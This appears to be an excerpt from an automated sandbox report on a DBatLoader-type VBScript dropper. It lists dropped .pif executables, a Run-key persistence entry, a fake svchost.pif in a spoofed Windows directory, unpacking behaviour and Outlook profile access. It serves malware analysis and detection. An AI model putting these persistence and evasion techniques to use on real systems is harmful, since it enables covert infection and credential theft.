Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: mscoree.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: version.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rasapi32.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rasman.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rtutils.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Section loaded: sspicli.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\Public\Libraries\fptrsiaN.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Draft doc PI ITS15235.vbs

Static file information: File size 2262031 > 1048576

Source:	Binary string: easinvoker.pdb source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.0000000020809000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1703545154.000000007EFD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702681878.000000007F010000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
Source:	Binary string: _.pdb source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1748492146.000000001B344000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1870177247.0000000020025000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000008.00000000.1748336244.0000000000151000.00000020.00000001.01000000.0000000C.sdmp, ndpha.pif.7.dr
Source:	Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000008.00000000.1748336244.0000000000151000.00000020.00000001.01000000.0000000C.sdmp, ndpha.pif.7.dr
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.0000000020809000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1703545154.000000007EFD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702681878.000000007F010000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1715222106.0000000000984000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1715222106.0000000000955000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Unpacked PE file: 6.2.fptrsiaN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Unpacked PE file: 10.2.fptrsiaN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Unpacked PE file: 15.2.fptrsiaN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Unpacked PE file: 6.2.fptrsiaN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Unpacked PE file: 10.2.fptrsiaN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Unpacked PE file: 15.2.fptrsiaN.pif.400000.0.unpack

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe");

Yara detected DBatLoader

Source: Yara match	File source: 1.2.x.exe.29c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000001.1912204476.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2971941444.0000000000ED0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2971881656.0000000000ED0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000001.1837489352.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1759642161.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2971876015.0000000000ED0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000001.1720780507.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])

Source: fptrsiaN.pif.1.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029D3E98 LoadLibraryW,GetProcAddress,FreeLibrary,

1_2_029D3E98

Source: x.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1a6f9e
Source: NETUTILS.dll.1.dr	Static PE information: real checksum: 0x28ece should be: 0x24de0
Source: fptrsiaN.pif.1.dr	Static PE information: real checksum: 0x0 should be: 0x1768a
Source: Naisrtpf.PIF.1.dr	Static PE information: real checksum: 0x0 should be: 0x1a6f9e

Source: svchost.pif.1.dr	Static PE information: section name: .imrsiv
Source: svchost.pif.1.dr	Static PE information: section name: .didat
Source: NETUTILS.dll.1.dr	Static PE information: section name: .xdata
Source: NETUTILS.dll.1.dr	Static PE information: section name: /4
Source: NETUTILS.dll.1.dr	Static PE information: section name: /19
Source: NETUTILS.dll.1.dr	Static PE information: section name: /31
Source: NETUTILS.dll.1.dr	Static PE information: section name: /45
Source: NETUTILS.dll.1.dr	Static PE information: section name: /57
Source: NETUTILS.dll.1.dr	Static PE information: section name: /70
Source: NETUTILS.dll.1.dr	Static PE information: section name: /81
Source: NETUTILS.dll.1.dr	Static PE information: section name: /92
Source: ndpha.pif.7.dr	Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029E62A4 push 029E630Fh; ret	1_2_029E6307
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029C3240 push eax; ret	1_2_029C327C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029E60AC push 029E6125h; ret	1_2_029E611D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D6018 push 029D6050h; ret	1_2_029D6048
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D4010 push 029D4048h; ret	1_2_029D4040
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D400E push 029D4048h; ret	1_2_029D4040
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029C61BE push 029C6202h; ret	1_2_029C61FA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029C61C0 push 029C6202h; ret	1_2_029C61FA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029E61F8 push 029E6288h; ret	1_2_029E6280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029E6144 push 029E61ECh; ret	1_2_029E61E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029CF678 push 029CF6C5h; ret	1_2_029CF6BD
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029CF677 push 029CF6C5h; ret	1_2_029CF6BD
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D2488 push ecx; mov dword ptr [esp], edx	1_2_029D248A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029CC42E push 029CC696h; ret	1_2_029CC68E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029CC510 push 029CC696h; ret	1_2_029CC68E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029CF56C push 029CF5E2h; ret	1_2_029CF5DA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029DA8B4 push ecx; mov dword ptr [esp], edx	1_2_029DA8B9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029DA918 push ecx; mov dword ptr [esp], edx	1_2_029DA91D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029CBE90 push ecx; mov dword ptr [esp], edx	1_2_029CBE95
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029CCEF8 pushad ; iretd	1_2_029CCEF9
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029CCE58 push 029CCE84h; ret	1_2_029CCE7C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D2F54 push 029D2FFFh; ret	1_2_029D2FF7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D2F52 push 029D2FFFh; ret	1_2_029D2FF7
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029E5C20 push 029E5DFCh; ret	1_2_029E5DF4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D3DB8 push 029D3DFAh; ret	1_2_029D3DF2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029C5DF4 push 029C5E4Fh; ret	1_2_029C5E47
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029C5DF2 push 029C5E4Fh; ret	1_2_029C5E47
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_0041C40C push cs; iretd	6_2_0041C4E2
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00423149 push eax; ret	6_2_00423179
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_0041C50E push cs; iretd	6_2_0041C4E2
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_004231C8 push eax; ret	6_2_00423179

Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'n6L6ilJ1cyqIe', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\fptrsiaN.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\ndpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\Naisrtpf.PIF	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\fptrsiaN.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\ndpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\Naisrtpf.PIF	Jump to dropped file

Source: C:\Windows\SysWOW64\extrac32.exe

File created: C:\Users\Public\ndpha.pif

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Windows \SysWOW64\svchost.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\extrac32.exe

File created: C:\Users\Public\ndpha.pif

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Naisrtpf			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Naisrtpf			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029D6490 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_029D6490

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
